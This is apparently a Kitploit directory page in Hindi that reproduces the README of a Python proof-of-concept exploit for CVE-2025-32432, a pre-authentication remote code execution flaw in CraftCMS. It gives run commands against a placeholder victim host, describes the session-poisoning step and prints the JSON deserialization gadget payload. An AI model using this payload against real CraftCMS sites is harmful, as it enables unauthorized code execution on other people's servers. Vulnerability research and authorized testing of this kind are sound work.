Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32432-PoC — CVE-2025-32432 के लिए Python एक्सप्लॉइट, जो CraftCMS asset-transform एंडपॉइंट में प्री-ऑथ RCE है। इसमें डिसीरियलाइज़ेशन गैजेट्स के माध्यम से मनमाने शेल कमांड निष्पादित करने के लिए दो-पैकेट चेन शामिल है। | Kitploit
उपकरण/GitHubGitHub/cty-research-1/cve-2025-32432-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

CVE-2025-32432 के लिए Python एक्सप्लॉइट, जो CraftCMS asset-transform एंडपॉइंट में प्री-ऑथ RCE है। इसमें डिसीरियलाइज़ेशन गैजेट्स के माध्यम से मनमाने शेल कमांड निष्पादित करने के लिए दो-पैकेट चेन शामिल है।

रिपॉजिटरी देखें
6411 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32432 Exploit Scripts (Python PoC)

CraftCMS 3.x / 4.x / 5.x के लिए Pre-auth Remote Code Execution
PoC अनुरक्षक: C.T.Y. (केवल शोध उपयोग)
भेद्यता खोज: Nicolas Bourras – Orange Cyberdefense
अतिरिक्त PoC प्रेरणा: SensePost शोध और Chirag Artani का सार्वजनिक स्क्रिप्ट


1. अवलोकन

इस रिपॉजिटरी में CVE-2025-32432 के लिए दो पूरक Python एक्सप्लॉइट्स हैं — CraftCMS के एसेट-ट्रांसफॉर्म एंडपॉइंट में एक प्री-ऑथेंटिकेशन RCE।

स्क्रिप्टउद्देश्य
craftcms_rce_php_check.pyसुरक्षा जांच — एक अनुरोध भेजता है जिसमें FnStream गैजेट का उपयोग करके यह सत्यापित किया जाता है कि मनमाना PHP निष्पादित होता है (phpinfo() आउटपुट प्रिंट करता है)। कम प्रभाव पुष्टि के लिए आदर्श।
craftcms_final_payload.pyपूर्ण एक्सप्लॉइट — दो-पैकेट श्रृंखला: पहले FnStream के माध्यम से PHP प्रत्यारोपित करता है, फिर FieldLayoutBehavior → PhpManager गैजेट का लाभ उठाकर किसी भी शेल कमांड को निष्पादित करता है।

दूसरी स्क्रिप्ट वह है जिसका वर्णन इस README में किया गया है।
पहली स्क्रिप्ट पूर्णता और त्वरित सत्यापन के लिए शामिल की गई है, जो Chirag Artani की सौजन्य है — क्रेडिट देखें।
स्पष्टता के लिए स्क्रिप्ट फ़ाइल नाम अनुकूलित किया गया; मूल संरचना और विचार Chirag Artani द्वारा।


2. चेतावनी 🚨

केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए।
इन स्क्रिप्टों का उपयोग स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध अवैध और अनैतिक है।


3. विशेषताएँ (अंतिम पेलोड)

  • एक-शॉट दो-पैकेट RCE
  • स्वचालित assetId ब्रूट-फोर्स (404 → 302 ह्युरिस्टिक)
  • कस्टम शेल-कमांड निष्पादन (-c/--cmd)
  • HTTP या HTTPS पर काम करता है (SSL-सत्यापन चेतावनियाँ दबा दी गई हैं)
  • HTML प्रतिक्रिया से कमांड आउटपुट की स्वच्छ निकासी

4. आवश्यकताएँ

  • Python 3.8+
  • PyPI पैकेज (इनके द्वारा इंस्टॉल करें pip install -r requirements.txt):
    • requests
    • urllib3

5. स्थापना

root@kitploit:~
# रिपोजिटरी क्लोन करें
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

6. उपयोग

6.1 त्वरित PHP-निष्पादन जांच

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://victim.com

यदि आप phpinfo() आउटपुट देखते हैं, तो लक्ष्य संभवतः शोषण योग्य है।

6.2 पूर्ण दो-पैकेट एक्सप्लॉइट

root@kitploit:~
python3 craftcms_final_payload.py -u https://victim.com -c "id"

विकल्प

विकल्पलंबा रूपविवरणआवश्यक
-u--urlलक्ष्य का आधार URL (कोई पिछला स्लैश नहीं)✅
-c--cmdनिष्पादित करने के लिए शेल कमांड✅
-a--assetज्ञात अच्छा assetId❌
-s--scan-maxब्रूट सीमा (डिफ़ॉल्ट: 300)❌

7. भेद्यता कैसे काम करती है (सारांश)

  • सत्र विषाक्तीकरण — GET से /index.php?p=admin/dashboard&a=<?=...?> /tmp/sess_<ID> में मनमाना PHP लिखता है।
  • डिसीरियलाइज़ेशन गैजेट — POST से actions/assets/generate-transform पर FieldLayoutBehavior → PhpManager गैजेट के साथ CraftCMS को सत्र फ़ाइल को require() करने के लिए मजबूर करता है, जिससे कोड निष्पादित होता है।
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. परीक्षित संस्करण

  • CraftCMS < 3.9.15 (आवश्यकता है assetId ब्रूट-फोर्स)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. संदर्भ और आगे पढ़ने के लिए

  • मूल परामर्श — Nicolas Bourras / Orange Cyberdefense
  • SensePost गहन-गोता ब्लॉग
  • Chirag Artani का PoC
  • CraftCMS सुरक्षा परामर्श
  • MITRE पर CVE-2025-32432

10. क्रेडिट

  • C.T.Y. — पूर्ण दो-पैकेट PoC और दस्तावेज़ीकरण
  • Chirag Artani — मूल phpinfo जांच स्क्रिप्ट (craftcms_rce_php_check.py) और प्रारंभिक शोध विचार स्पष्टता के लिए स्क्रिप्ट फ़ाइल नाम अनुकूलित किया गया; मूल संरचना और विचार Chirag Artani द्वारा।
  • Nicolas Bourras / Orange Cyberdefense — भेद्यता खोज और जिम्मेदार प्रकटीकरण
  • SensePost शोध टीम से अतिरिक्त अंतर्दृष्टि

11. लाइसेंस

जिम्मेदारी सूचना: इस कोड के उपयोग से उत्पन्न होने वाले किसी भी कानूनी जोखिम या क्षति के लिए पूरी जिम्मेदारी उपयोगकर्ता की है।

MIT लाइसेंस — LICENSE देखें।


हिंदी सारांश

1. परियोजना सामग्री

फ़ाइलउद्देश्य
craftcms_rce_php_check.pyPHP निष्पादन व्यवहार्यता जांच: एकल अनुरोध, FnStream का उपयोग करके phpinfo() ट्रिगर करता है, कम प्रभाव में लक्ष्य की भेद्यता सत्यापित करता है।
यह फ़ाइल नाम स्पष्टता के लिए अनुकूलित किया गया, मूल विचार और कोड संरचना Chirag Artani से।
craftcms_final_payload.pyदो-पैकेट श्रृंखला पूर्ण शोषण: पहले FnStream के साथ PHP प्रत्यारोपित करता है, फिर PhpManager के माध्यम से कोई भी कमांड निष्पादित करता है।

2. अस्वीकरण

केवल शैक्षिक और कानूनी रूप से अधिकृत परीक्षण के लिए। अनधिकृत संचालन अवैध है।


3. त्वरित जांच

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://लक्ष्य.कॉम

4. पूर्ण शोषण

root@kitploit:~
python3 craftcms_final_payload.py -u https://लक्ष्य.कॉम -c "id"

पैरामीटर अंग्रेज़ी संस्करण के समान हैं।


5. आभार

  • Chirag Artani — phpinfo जांच स्क्रिप्ट यह फ़ाइल नाम स्पष्टता के लिए अनुकूलित किया गया, मूल विचार और कोड संरचना Chirag Artani से।
  • Nicolas Bourras / Orange Cyberdefense — भेद्यता खोज और तकनीकी प्रेरणा
  • SensePost — तकनीकी प्रेरणा

6. लाइसेंस

इस कोड के उपयोग से उत्पन्न किसी भी कानूनी जोखिम और हानि के लिए उपयोगकर्ता स्वयं जिम्मेदार है।

MIT लाइसेंस

टूल डाउनलोड करें